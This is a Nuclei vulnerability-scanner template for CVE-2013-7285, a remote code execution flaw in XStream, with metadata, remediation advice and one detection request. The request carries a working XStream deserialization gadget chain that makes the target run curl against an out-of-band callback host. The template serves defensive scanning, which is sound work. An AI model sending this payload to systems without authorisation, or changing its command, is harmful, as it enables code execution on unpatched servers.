nuclei-templates/http/cves/2013/CVE-2013-7285.yaml

67 lines
2.5 KiB
YAML

id: CVE-2013-7285
info:
name: XStream <1.4.6/1.4.10 - Remote Code Execution
author: pwnhxl,vicrack
severity: critical
description: |
Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
remediation: |
Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability.
reference:
- https://x-stream.github.io/CVE-2013-7285.html
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html
- https://www.mail-archive.com/user@xstream.codehaus.org/msg00604.html
- https://nvd.nist.gov/vuln/detail/cve-2013-7285
- https://blog.csdn.net/Xxy605/article/details/126297121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2013-7285
cwe-id: CWE-78
epss-score: 0.33561
epss-percentile: 0.96568
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xstream_project
product: xstream
tags: cve,cve2013,xstream,deserialization,rce,oast
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<sorted-set>
<string>foo</string>
<contact class='dynamic-proxy'>
<interface>java.lang.Comparable</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>curl</string>
<string>http://{{interactsh-url}}</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
</sorted-set>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 490a0046304402202b9175c0bbaaec54c4732759e819f1a70dd838fdb56c53e143a021d10850f23b0220095a89fa91b9e1216a6c9d00ee669644d59e08eb3d33ee67f1c136939213a17b:922c64590222798bb761d5b6d8e72950